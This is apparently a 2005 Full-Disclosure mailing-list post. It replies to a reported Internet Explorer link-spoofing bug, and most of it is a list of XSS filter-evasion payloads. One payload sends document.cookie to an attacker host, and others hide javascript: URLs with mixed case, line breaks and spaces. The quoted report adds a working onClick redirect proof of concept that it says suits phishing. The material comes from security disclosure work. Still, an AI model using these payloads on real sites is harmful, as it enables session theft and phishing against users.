You can then mix it with some classical XSS tricks like
Basic XSS test detected:
<a href="javascript:alert('XSS')" title="http://www.google.com";>hello0</a>
<a
href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
+document.cookies</script>">Click here</a>
Basic XSS test :
<a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com";>hello0</a>
UTF-8:
<a
href="javascript:alert('XSS')"
title="http://www.google.com";>hello</a>
Long UTF-8 Unicode encoding without semicolons:
<a
href= javascript:alert('XSS')
title="http://www.google.com";
onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a>
Embedded newline to break up XSS:
<a href=jav
ascript:alert('XSS'); title="http://www.google.com";
hover="http://www.google.com";>hello2</a>
Embedded carriage return to break up XSS (doesn't appear as link):
<a href=jav
ascript:alert('XSS'); title="http://www.google.com";
onmouseover="image(this.href);">hello3</a>
Inserting spaces in href link:
<a href=" javascript:alert('XSS');" title="http://www.google.com";>hello4</a>
etc...
some bypass the Opera anti-illegal-urls
K-Gen Gen wrote:
>New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
>
>Gr337s .. I (K-Gen) have found a new (I think..) URL spoofing bug in IE.
>
>Affected : All MS-IE Browsers (Win XP SP2 as well).
>
>This allows a malicious website to host a specially crafted A HREF tag
>that shows to the user
>as a link to one location, but actually redirects to another. This can
>be used in Phishing scams
>and other malicious attacks.
>
>The basic idea here is to write a geniune <a href=""> </a>tag but
>include an onClick event handeler
>that will redirect (window.location="";) to another page. The next
>example won't work:
>
><a href="http://microsoft.com";
>onClick="window.location='http://google.com';">Microsoft</a>
>
>Probably there is some protection in IE .. but not enough :)
>
>If we try the next thing:
>
><a href="http://microsoft.com"; onClick="alert()">Microsoft</a>
>
>An alert WILL pop-up before redirecting. The same thing will happen to
>the document.write("");
>method, it will execute before redirection.
>
>Hence, the next Proof of Concept:
>
><a href="http://microsoft.com";
>onClick="document.write(unescape('%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e'))">Microsoft</a>
>
>Put the code into an HTML page and see for yourself. In the status bar
>and in the properties the
>link appears as http://microsoft.com , but if you click on the link it
>will redirect you to
>http://google.com .
>
>I used unescape becuse characters like < > and ' cause run-time errors...
>
>This is not extremely critical as the old %01@ bug (That still works
>on my IE sp1 :lol:), becuase
>It does not obscure the real link in the Address bar, but i bet there
>will be a PoC for this one too, sooner or later...
>
>Have a Nice Day.
>K-Gen
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/